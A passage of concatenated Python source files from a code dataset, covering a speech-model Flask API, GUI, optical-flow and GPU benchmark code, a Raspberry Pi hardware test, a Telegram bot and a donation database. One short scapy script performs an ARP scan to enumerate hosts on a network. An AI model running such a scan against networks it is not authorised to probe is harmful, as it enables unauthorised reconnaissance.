\"\"\"Captures stdout/stderr and returns the combined output\n    from the CompletedProcess result object\"\"\"\n    args = shlex.split(cmd)\n    process = subprocess.run(\n        args,\n        check=True,\n        stdout=subprocess.PIPE,\n        stderr=subprocess.STDOUT\n    )\n    return process.stdout\n\n\n@bp.route(\"/new\", methods=['POST'])\ndef new():\n    kaldi: KaldiInterface = app.config['INTERFACE']\n    model = kaldi.new_model(request.json[\"name\"])\n    # use the selected pron dict\n    pron_dict = kaldi.get_pron_dict(request.json['pron_dict_name'])\n    # get its dataset\n    dataset = kaldi.get_dataset(pron_dict.dataset.name)\n    app.config['CURRENT_DATASET'] = dataset\n    app.config['CURRENT_PRON_DICT'] = pron_dict\n    model.link(dataset, pron_dict)\n    model.build_kaldi_structure()\n    app.config['CURRENT_MODEL'] = model\n    data = {\n        \"config\": model.config._load()\n    }\n    return jsonify({\n        \"status\": 200,\n        \"data\": data\n    })\n\n\n@bp.route(\"/load\", methods=['POST'])\ndef load():\n    kaldi: KaldiInterface = app.config['INTERFACE']\n    model = kaldi.get_model(request.json[\"name\"])\n    # set the dataset to match the model\n    app.config['CURRENT_DATASET'] = model.dataset\n    app.config['CURRENT_PRON_DICT'] = model.pron_dict\n    app.config['CURRENT_MODEL'] = model\n    data = {\n        \"config\": model.config._load()\n    }\n    return jsonify({\n        \"status\": 200,\n        \"data\": data\n    })\n\n\n@bp.route(\"/list\", methods=['GET'])\ndef list_existing():\n    kaldi: KaldiInterface = app.config['INTERFACE']\n    fake_results = {}\n    data = {\n        \"list\": [{\n            'name': model['name'],\n            'results': fake_results,\n            'dataset_name': model['dataset_name'],\n            'pron_dict_name': model['pron_dict_name']\n        } for model in kaldi.list_models_verbose()]\n    }\n    return jsonify({\n        \"status\": 200,\n        \"data\": data\n    })\n\n\n@bp.route(\"/settings\", methods=['POST'])\ndef settings():\n    model = app.config['CURRENT_MODEL']\n    if model is None:\n        return jsonify({\"status\":404, \"data\": \"No current model exists (perhaps create one first)\"})\n    if request.method == 'POST':\n        model.ngram = request.json['ngram']\n    data = {\n        \"settings\":{\n            \"ngram\": model.ngram\n        }\n    }\n    return jsonify({\n        \"status\": 200,\n        \"data\": data\n    })\n\n\n@bp.route(\"/train\", methods=['GET'])\ndef train():\n    model: Model = app.config['CURRENT_MODEL']\n    if model is None:\n        return jsonify({\"status\":404, \"data\": \"No current model exists (perhaps create one first)\"})\n    model.train(on_complete=lambda: print(\"Training complete!\"))\n    data = {\n        \"status\": model.status\n    }\n    return jsonify({\n        \"status\": 200,\n        \"data\": data\n    })\n\n\n@bp.route(\"/status\", methods=['GET'])\ndef status():\n    model: Model = app.config['CURRENT_MODEL']\n    if model is None:\n        return jsonify({\"status\":404, \"data\": \"No current model exists (perhaps create one first)\"})\n    data = {\n        \"status\": model.status\n    }\n    return jsonify({\n        \"status\": 200,\n        \"data\": data\n    })\n\n\n@bp.route(\"/results\", methods=['GET'])\ndef results():\n    model: Model = app.config['CURRENT_MODEL']\n    if model is None:\n        return jsonify({\"status\":404, \"data\": \"No current model exists (perhaps create one first)\"})\n    wer_lines = []\n    log_file = Path('/elpis/state/tmp_log.txt')\n    results = {}\n    if log_file.exists():\n        with log_file.open() as fin:\n            for line in reversed(list(fin)):\n                line = line.rstrip()\n                if \"%WER\" in line:\n                    # use line to sort by best val\n                    line_r = line.replace('%WER ', '')\n                    wer_lines.append(line_r)\n            wer_lines.sort(reverse = True)\n            line = wer_lines[0]\n            line_split = line.split(None, 1)\n            wer = line_split[0]\n            line_results = 
line_split[1]\n            line_results = line_results.replace('[','')\n            line_results = line_results.replace(']','')\n            results_split = line_results.split(',')\n            count_val = results_split[0].strip()\n            ins_val = results_split[1].replace(' ins','').strip()\n            del_val = results_split[2].replace(' del','').strip()\n            sub_val = results_split[3].replace(' sub','').strip()\n            results = {'wer':wer, 'count_val':count_val, 'ins_val':ins_val, 'del_val':del_val, 'sub_val':sub_val}\n            print(results)\n    else:\n        return jsonify({\"status\":404, \"data\": \"No log file was found, couldn't parse the results\"})\n    data = {\n        \"results\": results\n    }\n    return jsonify({\n        \"status\": 200,\n        \"data\": data\n    })\n","sub_path":"elpis/endpoints/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"157814218","text":"from tkinter import *\nimport pickle\nimport os\n\n\nclass HistoryFrame:\n    def __init__(self, mf):\n        self.main_frame = mf\n\n        self.frame = Frame(self.main_frame, width=1050, height=560, bg=\"#f1f1f1\")\n\n        # Loading the data history\n        parent = os.path.abspath(os.path.join('frames', os.pardir))\n        self.data = pickle.loads(open(parent+\"/data/hist_data.pickle\", \"rb\").read())\n\n        self.header_frame_data()\n\n        self.frame_container = Frame(self.frame, bg=\"#FAFAFA\")\n        self.frame_container.place(x=130, y=80)\n        self.frame_data = None\n        self.canvas_scroll()\n        self.create_list()\n\n    def header_frame_data(self):\n\n        frame_header = Frame(self.frame, width=800, height=60, bg=\"#102027\")\n        Label(frame_header, text=\"ID\", bg=\"#102027\", fg=\"#ffffff\", font=(\"Roboto\", 17)).place(x=20, y=13)\n        Label(frame_header, text=\"Date\", bg=\"#102027\", fg=\"#ffffff\", font=(\"Roboto\", 17)).place(x=190, y=13)\n        Label(frame_header, text=\"Votes\", bg=\"#102027\", fg=\"#ffffff\", font=(\"Roboto\", 17)).place(x=440, y=13)\n        Label(frame_header, text=\"Average\", bg=\"#102027\", fg=\"#ffffff\", font=(\"Roboto\", 17)).place(x=560, y=13)\n        Label(frame_header, text=\"Mode\", bg=\"#102027\", fg=\"#ffffff\", font=(\"Roboto\", 17)).place(x=690, y=13)\n        frame_header.place(x=130, y=20)\n\n    def canvas_scroll(self):\n        vscrollbar = Scrollbar(self.frame_container, orient=VERTICAL)\n        vscrollbar.pack(fill=Y, side=RIGHT, expand=FALSE)\n        canvas = Canvas(self.frame_container, height=450, bd=0, highlightthickness=0,\n                        yscrollcommand=vscrollbar.set)\n        canvas.pack(side=LEFT, fill=BOTH, expand=TRUE)\n        vscrollbar.config(command=canvas.yview)\n\n        # reset the view\n        canvas.xview_moveto(0)\n        canvas.yview_moveto(0)\n\n        # create a frame inside the canvas which will be scrolled with it\n        self.frame_data = frame_data = Frame(canvas, bg=\"#FAFAFA\")\n        interior_id = canvas.create_window(0, 0, window=frame_data,\n                                           anchor=NW)\n\n        def _configure_interior(e):\n            size = (frame_data.winfo_reqwidth(), frame_data.winfo_reqheight())\n            canvas.config(scrollregion=\"0 0 %s %s\" % size)\n            if frame_data.winfo_reqwidth() != canvas.winfo_width():\n                canvas.config(width=frame_data.winfo_reqwidth())\n\n        frame_data.bind('<Configure>', _configure_interior)\n\n        def _configure_canvas(e):\n            if frame_data.winfo_reqwidth() != canvas.winfo_width():\n                canvas.itemconfigure(interior_id, width=canvas.winfo_width())\n\n        canvas.bind('<Configure>', _configure_canvas)\n\n    def create_list(self):\n        # Loading the data in labels\n        for r, ob_list in enumerate(self.data):\n            for c, ob_tup in enumerate(ob_list):\n                Label(self.frame_data, text=ob_tup, bg=\"#FAFAFA\", fg=\"#333333\", font=(\"Roboto Lt\", 
16)).grid(row=r,\n column=c,\n sticky=W,\n ipady=10,\n ipadx=30)\n\n def place_frame(self):\n self.frame.place(x=0, y=80)\n\n def forget_place(self):\n self.frame.place_forget()\n\n def delete_history(self):\n print(\"DELETE\")\n","sub_path":"frames/HistoryFrame.py","file_name":"HistoryFrame.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"517084863","text":"import argparse\nimport io\nimport os\nimport time\nimport urllib.request\nimport zipfile\nimport torch\nfrom torch.nn import functional as F\n\ntry:\n from core.raft import RAFT as RAFT_module\nexcept ModuleNotFoundError:\n from .core.raft import RAFT as RAFT_module\n\nmodels_url = \"https://www.dropbox.com/s/a2acvmczgzm6f9n/models.zip?dl=1\" # dl=1 is important\n\n\n__all__ = [\"RAFT\"]\n\n\nENV_TORCH_HOME = \"TORCH_HOME\"\nENV_XDG_CACHE_HOME = \"XDG_CACHE_HOME\"\nDEFAULT_CACHE_DIR = \"~/.cache\"\n\n\ndef _get_torch_home():\n torch_home = os.path.expanduser(\n os.getenv(\n ENV_TORCH_HOME, os.path.join(os.getenv(ENV_XDG_CACHE_HOME, DEFAULT_CACHE_DIR), \"torch\")\n )\n )\n return torch_home\n\n\ndef _pad8(img):\n \"\"\"pad image such that dimensions are divisible by 8\"\"\"\n ht, wd = img.shape[2:]\n pad_ht = (((ht // 8) + 1) * 8 - ht) % 8\n pad_wd = (((wd // 8) + 1) * 8 - wd) % 8\n pad_ht1 = [pad_ht // 2, pad_ht - pad_ht // 2]\n pad_wd1 = [pad_wd // 2, pad_wd - pad_wd // 2]\n\n img = F.pad(img, pad_wd1 + pad_ht1, mode=\"replicate\")\n return img\n\n\ndef RAFT(pretrained=False, model_name=\"chairs+things\", device=None, **kwargs):\n \"\"\"\n RAFT model (https://arxiv.org/abs/2003.12039)\n model_name (str): One of 'chairs+things', 'sintel', 'kitti' and 'small'\n note that for 'small', the architecture is smaller\n \"\"\"\n\n model_list = [\"chairs+things\", \"sintel\", \"kitti\", \"small\"]\n if model_name not in model_list:\n raise ValueError(\"Model should be one of \" + str(model_list))\n\n model_args = argparse.Namespace(**kwargs)\n model_args.small = \"small\" in model_name\n\n model = RAFT_module(model_args)\n if device is None:\n device = torch.cuda.current_device() if torch.cuda.is_available() else \"cpu\"\n if device != \"cpu\":\n model = torch.nn.DataParallel(model, device_ids=[device])\n else:\n model = torch.nn.DataParallel(model)\n model.device_ids = None\n\n if pretrained:\n torch_home = _get_torch_home()\n model_dir = os.path.join(torch_home, \"checkpoints\", \"models_RAFT\")\n model_path = os.path.join(model_dir, \"models\", model_name + \".pth\")\n if not os.path.exists(model_dir):\n os.makedirs(model_dir, exist_ok=True)\n response = urllib.request.urlopen(models_url, timeout=10)\n z = zipfile.ZipFile(io.BytesIO(response.read()))\n z.extractall(model_dir)\n else:\n time.sleep(10) # Give the time for the models to be downloaded and unzipped\n\n map_location = torch.device('cpu') if device == \"cpu\" else None\n model.load_state_dict(torch.load(model_path, map_location=map_location))\n\n model = model.to(device)\n model.eval()\n return model\n\n\ndef apply_model(model, images_from, images_to, iters=12, upsample=True):\n \"\"\"\n Applies optical flow model to the pairs of images\n Args:\n images_from: torch.Tensor of size [B, H, W, C] containing RGB data for\n images that serve as optical flow source images\n images_to: torch.Tensor of size [B, H, W, C] containing RGB data for\n images that serve as optical flow destination images\n Return:\n optical_flow: torch.Tensor of size [B, H, W, 2]\n \"\"\"\n images_from, images_to 
= _pad8(images_from), _pad8(images_to)\n with torch.no_grad():\n return model(image1=images_from, image2=images_to, iters=iters, upsample=upsample)\n","sub_path":"hubconf_models.py","file_name":"hubconf_models.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"120973843","text":"#!/usr/bin/python\nimport os\nimport math\nimport sys\nimport time\nimport numpy as np\nimport torch\n\nsys.path.append(\"../../lib\")\nsys.path.append(\"../../pycomposer\")\nsys.path.append(\".\")\n\nfrom sa.annotation import Backend\nfrom mode import Mode\n\nDEFAULT_SIZE = 1 << 26\nDEFAULT_CPU = 1 << 13\nMAX_BATCH_SIZE = 1 << 28\n\n\ndef get_data(size):\n \"\"\"Input data starts on the CPU, as if it came from another\n step in the pipeline.\n\n Parameters:\n - size: number of elements\n \"\"\"\n\n lats = np.ones(size, dtype='float64') * 0.0698132\n lons = np.ones(size, dtype='float64') * 0.0698132\n return lats, lons\n\n\ndef haversine(lat2, lon2, oas=True, use_torch=True):\n \"\"\"The \"original\" workload.\n\n Parameters:\n - oas: true if using OAs, false if using the CPU library\n - use_torch: true if torch, false if cupy (only relevant if using OAs)\n \"\"\"\n if oas:\n if use_torch:\n import sa.annotated.numpy_torch as np\n import sa.annotated.numpy_torch as ss\n else:\n import sa.annotated.numpy_cupy as np\n import sa.annotated.numpy_cupy as ss\n else:\n import numpy as np\n import scipy.special as ss\n\n # Allocate output array and temporary arrays\n size = len(lat2)\n a = np.empty(size, dtype='float64')\n dlat = np.empty(size, dtype='float64')\n dlon = np.empty(size, dtype='float64')\n\n if oas:\n a.materialize = Backend.CPU\n\n # Begin computation\n lat1 = 0.70984286\n lon1 = 1.23892197\n MILES_CONST = 3959.0\n\n np.subtract(lat2, lat1, out=dlat)\n np.subtract(lon2, lon1, out=dlon)\n\n # dlat = sin(dlat / 2.0) ** 2.0\n np.divide(dlat, 2.0, out=dlat)\n np.sin(dlat, out=dlat)\n np.multiply(dlat, dlat, out=dlat)\n\n # a = cos(lat1) * cos(lat2)\n lat1_cos = math.cos(lat1)\n np.cos(lat2, out=a)\n np.multiply(a, lat1_cos, out=a)\n\n # a = a + sin(dlon / 2.0) ** 2.0\n np.divide(dlon, 2.0, out=dlon)\n np.sin(dlon, out=dlon)\n np.multiply(dlon, dlon, out=dlon)\n np.multiply(a, dlon, out=a)\n np.add(dlat, a, out=a)\n\n c = a\n np.sqrt(a, out=a)\n np.arcsin(a, out=a)\n np.multiply(a, 2.0, out=c)\n\n mi = c\n np.multiply(c, MILES_CONST, out=mi)\n\n # Materialize outputs\n if oas:\n np.evaluate(\n workers=1,\n batch_size={\n Backend.CPU: DEFAULT_CPU,\n Backend.GPU: MAX_BATCH_SIZE,\n },\n force_cpu=False,\n paging=size > MAX_BATCH_SIZE,\n )\n return a.value\n else:\n return a\n\n\ndef run_numpy(lats, lons):\n return haversine(lats, lons, oas=False)\n\n\ndef run_bach_torch(lats, lons):\n return haversine(lats, lons, oas=True, use_torch=True)\n\n\ndef run_bach_cupy(lats, lons):\n return haversine(lats, lons, oas=True, use_torch=False)\n\n\ndef run_torch(lat2, lon2):\n import torch\n\n # Allocate temporary arrays\n size = len(lat2)\n a = torch.empty(size, dtype=torch.float64, device=torch.device('cuda'))\n dlat = torch.empty(size, dtype=torch.float64, device=torch.device('cuda'))\n dlon = torch.empty(size, dtype=torch.float64, device=torch.device('cuda'))\n\n # Transfer inputs to the GPU\n lat2 = torch.from_numpy(lat2).cuda()\n lon2 = torch.from_numpy(lon2).cuda()\n\n # Begin computation\n lat1 = 0.70984286\n lon1 = 1.23892197\n MILES_CONST = 3959.0\n\n torch.sub(lat2, lat1, out=dlat)\n torch.sub(lon2, lon1, out=dlon)\n\n # 
dlat = sin(dlat / 2.0) ** 2.0\n torch.div(dlat, 2.0, out=dlat)\n torch.sin(dlat, out=dlat)\n torch.mul(dlat, dlat, out=dlat)\n\n # a = cos(lat1) * cos(lat2)\n lat1_cos = math.cos(lat1)\n torch.cos(lat2, out=a)\n torch.mul(a, lat1_cos, out=a)\n\n # a = a + sin(dlon / 2.0) ** 2.0\n torch.div(dlon, 2.0, out=dlon)\n torch.sin(dlon, out=dlon)\n torch.mul(dlon, dlon, out=dlon)\n torch.mul(a, dlon, out=a)\n torch.add(dlat, a, out=a)\n\n c = a\n torch.sqrt(a, out=a)\n torch.asin(a, out=a)\n torch.mul(a, 2.0, out=c)\n\n mi = c\n torch.mul(c, MILES_CONST, out=mi)\n\n # Transfer outputs back to CPU\n torch.cuda.synchronize()\n a = a.cpu().numpy()\n\n return a\n\n\ndef run_cupy(lat2, lon2):\n import cupy as cp\n\n # Allocate temporary arrays\n size = len(lat2)\n a = cp.empty(size, dtype='float64')\n dlat = cp.empty(size, dtype='float64')\n dlon = cp.empty(size, dtype='float64')\n\n # Transfer inputs to the GPU\n lat2 = cp.array(lat2)\n lon2 = cp.array(lon2)\n\n # Begin computation\n lat1 = 0.70984286\n lon1 = 1.23892197\n MILES_CONST = 3959.0\n\n cp.subtract(lat2, lat1, out=dlat)\n cp.subtract(lon2, lon1, out=dlon)\n\n # dlat = sin(dlat / 2.0) ** 2.0\n cp.divide(dlat, 2.0, out=dlat)\n cp.sin(dlat, out=dlat)\n cp.multiply(dlat, dlat, out=dlat)\n\n # a = cos(lat1) * cos(lat2)\n lat1_cos = math.cos(lat1)\n cp.cos(lat2, out=a)\n cp.multiply(a, lat1_cos, out=a)\n\n # a = a + sin(dlon / 2.0) ** 2.0\n cp.divide(dlon, 2.0, out=dlon)\n cp.sin(dlon, out=dlon)\n cp.multiply(dlon, dlon, out=dlon)\n cp.multiply(a, dlon, out=a)\n cp.add(dlat, a, out=a)\n\n c = a\n cp.sqrt(a, out=a)\n cp.arcsin(a, out=a)\n cp.multiply(a, 2.0, out=c)\n\n mi = c\n cp.multiply(c, MILES_CONST, out=mi)\n\n # Transfer outputs back to CPU\n a = cp.asnumpy(a)\n\n return a\n\n\ndef run(mode, use_torch, size, cpu, gpu, threads):\n # Optimal defaults\n if size == None:\n size = DEFAULT_SIZE\n if mode == Mode.GPU or mode == Mode.BACH:\n torch.cuda.init()\n torch.cuda.synchronize()\n\n start = time.time()\n inputs = get_data(size)\n print('Inputs:', time.time() - start)\n\n start = time.time()\n if mode == Mode.CPU:\n result = run_numpy(*inputs)\n elif mode == Mode.GPU:\n if use_torch:\n result = run_torch(*inputs)\n else:\n result = run_cupy(*inputs)\n elif mode == Mode.BACH:\n if use_torch:\n result = run_bach_torch(*inputs)\n else:\n result = run_bach_cupy(*inputs)\n else:\n raise ValueError\n runtime = time.time() - start\n sys.stdout.write('Runtime: {}\\n'.format(runtime))\n sys.stdout.flush()\n\n print(result)\n return 0, runtime\n\n\ndef run_torch_main(mode, size=None, cpu=None, gpu=None, threads=1):\n return run(mode, True, size=size, cpu=cpu, gpu=gpu, threads=threads)\n\n\ndef run_cupy_main(mode, size=None, cpu=None, gpu=None, threads=1):\n return run(mode, False, size=size, cpu=cpu, gpu=gpu, threads=threads)\n","sub_path":"benchmarks/workloads/haversine.py","file_name":"haversine.py","file_ext":"py","file_size_in_byte":6445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"192378478","text":"#\n# This Script is for bare bones functionality testing of the RPiMIB\n#\n# This file is intended to be a script that is run from ipython3, for example the code here should be copied an pasted\n# sometimes line by line into the ipython3 console.\n#\n# At some point this should be made into a full testing script that can be run from the command line.\n# Or perhaps it can be brought into Unit Tests.\n\nimport spidev\nimport os\nfrom time import sleep\nimport RPi.GPIO as GPIO\nfrom pidev.stepper 
import stepper\nfrom Slush.Devices import L6470Registers\nfrom pidev.Cyprus_Commands import Cyprus_Commands_RPi as cyprus\nspi = spidev.SpiDev()\n\n# Init a 200 steps per revolution stepper on Port 0\ns0 = stepper(port=0, micro_steps=32, hold_current=20, run_current=20, accel_current=20, deaccel_current=20,\n steps_per_unit=200, speed=8)\n\ns0.start_relative_move(5) # make motor on port 0 rotate 5 turns\n\ns0.free_all()\n\ncyprus.initialize() # initialize the cyprus\nversion = cyprus.read_firmware_version() # read the version of the cyprus firmware\nprint(version) # print the version to the screen - should be something like 3.1.2 (11/12/19)\n\ncyprus.setup_servo(1) # sets up P4 on the RPiMIB as a RC servo style output\n\ncyprus.set_servo_position(1, 0) # 1 specifies port P4, 0 is a float from 0-1 that specifies servo position ~(0-180deg)\n\nsleep(1) # wait one second for the servo to get there\n\ncyprus.set_servo_position(1, .5) # 1 specifies port P4, 0.5 specifies servo position ~(0-180deg) range of (0-1)\n\nsleep(1) # wait one second for the servo to get there... minimum here should be about sleep(0.05)\n\ncyprus.set_servo_position(1, 1) # 1 specifies port P4, 1 specifies servo position ~(0-180deg) range of (0-1)\n\n# test the RPiMIB P6 reads - connect a limit switch or proximity sensor to P6 run the code below\nwhile True:\n if (cyprus.read_gpio() & 0b0001): # binary bitwise AND of the value returned from read.gpio()\n sleep(1)\n if (cyprus.read_gpio() & 0b0001): # a little debounce logic\n print(\"GPIO on port P6 is HIGH\")\n else:\n print(\"GPIO on port P6 is LOW\")\n sleep(1)\n# opening and closing the switch or proximity sensor should get the print to toggle between HIGH and LOW\n\n# test the RPiMIB P7 reads - connect a limit switch or proximity sensor to P7 run the code below\nwhile True:\n if (cyprus.read_gpio() & 0b0010): # binary bitwise AND of the value returned from read.gpio()\n sleep(1)\n if (cyprus.read_gpio() & 0b0010):\n print(\"GPIO on port P7 is HIGH\")\n else:\n print(\"GPIO on port P7 is LOW\")\n sleep(1)\n# opening and closing the switch or proximity sensor should get the print to toggle between HIGH and LOW\n\n# test the RPiMIB P8 reads - connect a limit switch or proximity sensor to P8 run the code below\nwhile True:\n if (cyprus.read_gpio() & 0b0100): # binary bitwise AND of the value returned from read.gpio()\n sleep(1)\n if (cyprus.read_gpio() & 0b0100): # a little debounce logic\n print(\"GPIO on port P8 is HIGH\")\n else:\n print(\"GPIO on port P8 is LOW\")\n sleep(1)\n# opening and closing the switch or proximity sensor should get the print to toggle between HIGH and LOW\n\n# test the RPiMIB P9 reads - connect a limit switch or proximity sensor to P9 run the code below\nwhile True:\n if (cyprus.read_gpio() & 0b1000): # binary bitwise AND of the value returned from read.gpio()\n sleep(1)\n if (cyprus.read_gpio() & 0b1000):\n print(\"GPIO on port P9 is HIGH\")\n else:\n print(\"GPIO on port P9 is LOW\")\n sleep(1)\n# opening and closing the switch or proximity sensor should get the print to toggle between HIGH and LOW\n# when done disconnect the RPiMIB communication\n\ncyprus.close()\nspi.close()\nGPIO.cleanup()","sub_path":"RPiMIB_Test_Script.py","file_name":"RPiMIB_Test_Script.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"112690100","text":"import scapy.all as scapy \r\nimport optparse\r\n\r\ndef get_user_input():\r\n\tparse_obje = 
optparse.OptionParser()\r\n\tparse_obje.add_option(\"-i\",\"--ipaddress\",dest=\"ip_address\",help=\"Enter IP Address\")\r\n\t\r\n\t(user_input,arguments) = parse_obje.parse_args()\r\n\t\r\n\tif not user_input.ip_address:\r\n\t\tprint(\"Enter IP Address\")\r\n\t\t\r\n\treturn user_input\r\n\t\t\r\n\r\ndef scan_my_network(ip):\t\r\n\tarp_request_packet = scapy.ARP(pdst=ip)\t\t\t\r\n\tbroadcast_packet = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\") \t\r\n\tcombined_packet = broadcast_packet/arp_request_packet\t\t\r\n\t(answered_list,unanswered_list) = scapy.srp(combined_packet,timeout=1)\r\n\t\r\n\tanswered_list.summary()\r\n\t\r\nuser_ip_address = get_user_input()\r\nscan_my_network(user_ip_address.ip_address)\r\n\r\n\r\n \r\n ","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"441584627","text":"# -*- coding: utf-8 -*-\r\n'''\r\n======================Welcome to Python====================\r\n/-********Have a good time.********-/\r\n\r\nFILE NAME:\r\nAUTHOR: Eden·Gabriel \r\nDATE: Dec-21-Thu/2018 12:26:25 \r\nVERSION: V-1.0\r\nDESCRIPTION:\r\nMorphological transformations\r\n'''\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nimg = cv2.imread('E:\\\\A_BOOM_LEARNING_EDEN_GABRIEL\\\\2018.12.19start_opencv+python\\\\Images\\\\pic2.png')\r\nimg_gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\nimg_gau = cv2.GaussianBlur(img_gray,(5,5),0)\r\nret,thre = cv2.threshold(img_gau,150,255,cv2.THRESH_BINARY_INV)\r\n\r\nkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))\r\n#kernel = np.ones((5,5),np.uint8)\r\n\r\nres = cv2.erode(thre,kernel,iterations = 1)\r\nopening = cv2.morphologyEx(thre,cv2.MORPH_OPEN,kernel)\r\nclosing = cv2.morphologyEx(thre,cv2.MORPH_CLOSE,kernel)\r\nopening_inv = cv2.bitwise_not(opening)\r\ngradient = cv2.morphologyEx(closing,cv2.MORPH_GRADIENT,kernel)\r\n\r\ntophat = cv2.morphologyEx(closing,cv2.MORPH_TOPHAT,kernel)\r\nblackhat = cv2.morphologyEx(closing,cv2.MORPH_BLACKHAT,kernel)\r\n\r\ncv2.imshow('tophat',tophat)\r\ncv2.imshow('blackhat',blackhat)\r\ncv2.imshow('gradient',gradient)\r\ncv2.imshow('closing',closing)\r\ncv2.imshow('opening_inv',opening_inv)\r\ncv2.imshow('opening',opening)\r\n#res1 = cv2.dilate(thre,kernel,iterations = 1)\r\ncv2.imshow('res',res)\r\n#cv2.imshow('res1',res1)\r\ncv2.imshow('thre',thre)\r\n\r\nk = cv2.waitKey(0)&0xFF\r\nif k == 27:\r\n    cv2.destroyAllWindows()\r\n","sub_path":"形态学变换.py","file_name":"形态学变换.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"565382896","text":"import telepot\nimport os\nimport requests\nimport time\nfrom telepot.loop import MessageLoop\n\n\n# Create bot using token saved as environment variable\nTOKEN = os.environ.get('TOKEN')\nbot = telepot.Bot(TOKEN)\n\ndef add_new_record(file, user_id):\n    \"\"\" Create new audio file in the folder named\n    as an id of a user who sent the record \"\"\"\n\n    dir_name = str(user_id)\n    if not os.path.exists(dir_name):\n        os.mkdir(dir_name)\n    number = str(len(os.listdir(dir_name)))\n    with open(dir_name + '/audio_message_' + number + '.oga', 'wb') as voice_message:\n        voice_message.write(file.content)\n\n\ndef on_chat_message(msg):\n    \"\"\" Process messages \"\"\"\n\n    content_type, chat_type, chat_id = telepot.glance(msg)\n    if content_type == 'voice':\n        user_id = msg['from']['id']\n        file_id = msg['voice']['file_id']\n        file_info = bot.getFile(file_id)\n        file = 
requests.get('https://api.telegram.org/file/bot{0}/{1}'\n                            .format(TOKEN, file_info['file_path']))\n        add_new_record(file, user_id)\n\n\nMessageLoop(bot, {'chat': on_chat_message}).run_as_thread()\nwhile True:\n    time.sleep(10)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"607496154","text":"from bisect import bisect_left, bisect_right\n\ndef count_by_range(a, left_value, right_value):\n    left_index = bisect_left(a, left_value)\n    right_index = bisect_right(a, right_value)\n    return right_index - left_index\n\ndef solution(words, queries):\n    answer = []\n    array = [[] for _ in range(10001)]\n    reverse_array = [[] for _ in range(10001)]\n    \n    for word in words:\n        array[len(word)].append(word)\n        reverse_array[len(word)].append(word[::-1])\n    \n    for i in range(10001):\n        array[i].sort()\n        reverse_array[i].sort()\n    \n    for i in queries:\n        if i[0] != \"?\":\n            ans = count_by_range(array[len(i)], i.replace('?', 'a'), i.replace('?','z'))\n        else:\n            ans = count_by_range(reverse_array[len(i)], i[::-1].replace('?','a'), i[::-1].replace('?','z'))\n        answer.append(ans)\n    return answer\n","sub_path":"pystudy/Exercise/이진탐색/Q30.py","file_name":"Q30.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"250909768","text":"'''\nfile: classes_mailroom.py\nelmar_m / 22e88@mailbox.org\nLesson09: classes for OOP mailroom program \n'''\n\nimport sqlite3, time\nfrom collections import defaultdict \n\nclass Donor:\n    def __init__(self, fname, lname):\n        self.firstname = fname\n        self.lastname = lname\n        self.uid = '{}_{}'.format(fname, lname) \n        self.db= sqlite3.connect('BLABLA.db')\n        self.dcursor = self.db.cursor()\n        self.dcursor.execute('''create table if not exists donors\n            (uid TEXT PRIMARY KEY, \n            fname TEXT, lname TEXT, last_donation INT DEFAULT 0)''')\n\n\n    def check_existence(self, uid):\n        self.dcursor.execute('select * from donors where uid = ?', (uid,))\n        result = self.dcursor.fetchall()\n        if len(result) == 0:\n            return None\n        else:\n            return True\n    \n    \n    def create(self, uid, fname, lname, last_donation=None):\n        try:\n            self.dcursor.execute('''insert into donors \n                (uid, fname, lname, last_donation)\n                values (?, ?, ?, ?)''', (uid, fname, lname, last_donation))\n            self.db.commit()\n            return True\n        except sqlite3.Error as e:\n            print('Exception raised: {}'.format(e))\n            return False\n\n\n    def get_last_donation(self, donor):\n        try:\n            self.dcursor.execute('select last_donation from donors where uid = ?', (donor,))\n            return self.dcursor.fetchall()\n        except sqlite3.Error as e:\n            print('Exception raised: {}'.format(e))\n            return None\n    \n\nclass Mailroom:\n    def __init__(self):\n        self.db= sqlite3.connect('BLABLA.db')\n        self.cursor = self.db.cursor()\n        self.cursor.execute('''create table if not exists mailroom\n            (donation_ID INTEGER PRIMARY KEY AUTOINCREMENT, \n            date TEXT, donor TEXT, donation INT DEFAULT 0)''')\n\n\n    def add_donation(self, donor, amount):\n        ts = time.strftime('%Y%m%d-%H%M%S')\n        try: \n            self.cursor.execute('insert into mailroom (date, donor, donation) values(?, ?, ?)', (ts, donor, amount)) \n            self.cursor.execute('update donors set last_donation = ? 
where uid = ?', (amount, donor)) \n self.db.commit()\n return True\n except sqlite3.Error as e:\n print('Exception raised: {}'.format(e))\n\n\n def get_donations(self, donor):\n self.cursor.execute('select date, donation from mailroom where donor = ?', (donor,))\n return self.cursor.fetchall()\n\n\n def _get_average_donation(self, donor):\n total = self._get_donations_total(donor)\n num = self._get_number_of_donations(donor)\n avg = total / num\n return format(avg, '.2f')\n \n\n def _get_number_of_donations(self, donor):\n self.cursor.execute('select * from mailroom where donor = ?', (donor,))\n num = self.cursor.fetchall()\n return len(num)\n\n \n def _get_donations_total(self, donor):\n self.cursor.execute('select donation from mailroom where donor = ?', (donor,))\n res = self.cursor.fetchall()\n dlist = [x[0] for x in res]\n total = sum(dlist) \n return total\n \n\n def get_all_donors(self):\n self.cursor.execute('select donor from mailroom')\n raw = 